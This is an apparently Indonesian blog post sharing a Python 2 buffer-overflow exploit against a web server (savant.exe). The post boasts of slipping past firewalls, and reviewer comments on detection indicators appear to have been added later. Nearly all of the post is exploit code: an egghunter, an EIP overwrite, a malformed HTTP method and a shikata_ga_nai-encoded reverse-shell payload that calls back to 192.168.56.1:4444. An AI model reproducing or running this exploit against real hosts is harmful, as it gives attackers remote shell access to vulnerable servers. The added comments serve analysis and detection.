kegunaannya buat encrypt payload dan nembus firewall yang hidup
ini gw tes dengan server gw di warnet dan ternyata wew tembus ^__^
silahkan di edit lagi tapi mohon jangan mengaku copyright soalnya saya gak ngaku copyright dalam post ini ^__^
cekidot shellcode nya
semoga bermanfaat buat kawan2 ^__^
#!/usr/bin/python
import socket

# Proof-of-concept exploit script as posted: it opens one TCP connection to a hardcoded
# address, sends a single crafted HTTP request and closes the socket. The request carries
# an egghunter stub, padding, a return-address overwrite and an encoded payload blob.
# Kept here for analysis only; nothing below validates its input or checks any result.
# Hardcoded lab target (an RFC 1918 private address); the script takes no arguments.
target_address="192.168.1.100"
target_port=80
# Egg tag, repeated twice, placed in front of the encoded payload; the egghunter string
# further down is commented as searching memory for this tag.
buffer2 = "R0cX" + "R0cX"
# msfpayload windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c
# NOTE(review): the bytes below are an opaque, multiply-encoded machine-code blob produced
# by the generator line above. Nothing on this page lets a reader verify what it does, so
# treat it as an untrusted binary: inspect it only in an isolated sandbox, never run it on
# a live host. Per the generator line it is intended to call back to 192.168.56.1:4444.
buffer2 += ("\xdb\xc4\xd9\x74\x24\xf4\x58\x29\xc9\xb1\x5d\xbb\x4d\xf5\xfa"
"\x3e\x31\x58\x1a\x83\xc0\x04\x03\x58\x16\xe2\xb8\x2c\x3a\xe7"
"\x36\xeb\x4f\xa7\x91\x16\xc4\x01\x85\xeb\xd2\x03\x62\x8f\x0d"
"\x9f\xbd\xf7\xde\x63\xe2\xf1\x68\x4f\x5a\xe3\xfe\x2b\x3e\x31"
"\x85\xb0\x17\x8c\x0b\x49\x9f\x2b\x21\x14\x94\xff\x8f\xf6\x7c"
"\x2c\x34\x58\x19\x99\x7c\x05\xfc\x22\xf8\x67\x0c\xdd\x5c\x2c"
"\x3f\x9e\x0b\x60\x62\x06\xa4\xef\xe3\xae\xff\x61\x2e\x04\x3d"
"\x99\x0c\x46\x50\x79\xc5\xfa\x72\xc7\x57\x09\x17\x3d\xee\xc3"
"\x3c\x46\x1a\x33\x2e\x32\xa4\xb0\xbd\x5f\x8d\xa1\x61\xd2\xf2"
"\x0a\xe2\x2c\x43\x62\xc8\xcf\xbf\x9e\x7a\xae\x85\x8c\xf7\x44"
"\x5f\x0f\xf8\x65\xf7\x45\xb3\xd5\x23\x62\x56\xda\x8c\x99\x91"
"\x54\x59\x66\xe5\x3b\x31\x1e\xb9\xc5\x1e\x23\x1c\xcc\xea\x4b"
"\xe1\x09\x74\x52\x60\xd4\x41\x46\xd7\xcd\xe9\x0f\xde\xa3\x8a"
"\x69\x84\x88\x67\x31\xcd\x5c\xca\x49\x49\x43\x15\x7d\x49\x9c"
"\xdb\xf0\x37\x89\x6f\xeb\x1c\x07\x84\xb3\x9a\x67\x4c\x77\x62"
"\x67\x66\x2a\x49\xba\xf6\xa6\x74\x16\xb0\x7f\x69\x4d\xc5\x6d"
"\xc6\x38\xcd\x63\x35\xa2\x38\x5c\x55\xcf\x6c\x6f\xa8\x0c\x09"
"\xcd\x3c\x85\xec\xad\xe3\x55\xe4\xfa\xac\x13\xfc\x7a\x54\xa3"
"\xe1\x45\xad\x79\xc6\x12\xcf\xe9\x7c\x5f\x06\xeb\x19\xd4\xfe"
"\xc9\x75\x43\x4c\x08\xb0\xef\xc8\x04\x8a\x16\x43\x16\xcf\x63"
"\x06\xfd\x41\x99\x74\x3c\x3c\x53\xd6\x16\x36\x98\xc2\xbf\x4c"
"\x0b\xb7\xc7\xef\x98\xf3\x7b\xfb\xcf\xc5\x61\x0b\xaa\x38\x8d"
"\x0e\x5a\x77\xa1\x9c\xde\x08\x32\x8c\xa0\xa3\xbe\xd2\xad\x69"
"\x92\x9e\x67\xbe\xc0\x1e\x00\x17\xb7\x9f\x3a\xc1\x51\xdc\xb3"
"\x5d\xdc\x4e\x85\x91\xdb\x42\xba\x70\x3f\x0b\x9c\x01\x84\x67"
"\x20\x45\x2a\xba\x15\xf8\xa5\xd8\x07\x17\x87\x36\x96\xbb\x11"
"\xbc\x58\x30\x36\x5c\x30\xb3\x71")
# NOTE(review): as rendered on this page the literal below contains a plain space character
# between "\x30" and "\x63"; that space is part of what the script sends. The page may have
# been altered in rendering, so do not lift this string verbatim as a detection signature.
badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30 \x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # egghunter searching for R0cX
# Pad the egghunter with 0x90 bytes up to a fixed 254-byte length. A long run of 0x90 in
# an HTTP request line is a cheap IDS/WAF indicator for this class of traffic.
badbuffer += "\x90" * (254 - len(badbuffer))
badbuffer += "\x09\x1D\x40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETN
# The HTTP "method" token is raw non-ASCII machine code rather than GET/POST; a request
# whose method is not a printable token is another straightforward thing to alert on.
httpmethod = "\xb0\x03\x04\x01\x7B\x14" # MOV AL, 3; ADD AL, 1; JPO 14
# Final wire format: <method bytes> " /%" <egghunter+padding+EIP> CRLF CRLF <tag+payload>.
sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2
# Plain blocking socket: no timeout, no error handling, no response read. socket.connect()
# returns None, so the `connect` name holds nothing useful. str objects are passed to
# send(), so this is Python 2 code (Python 3 requires bytes here).
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(sendbuf)
sock.close()
sumber: http://central-cyber2.blogspot.com/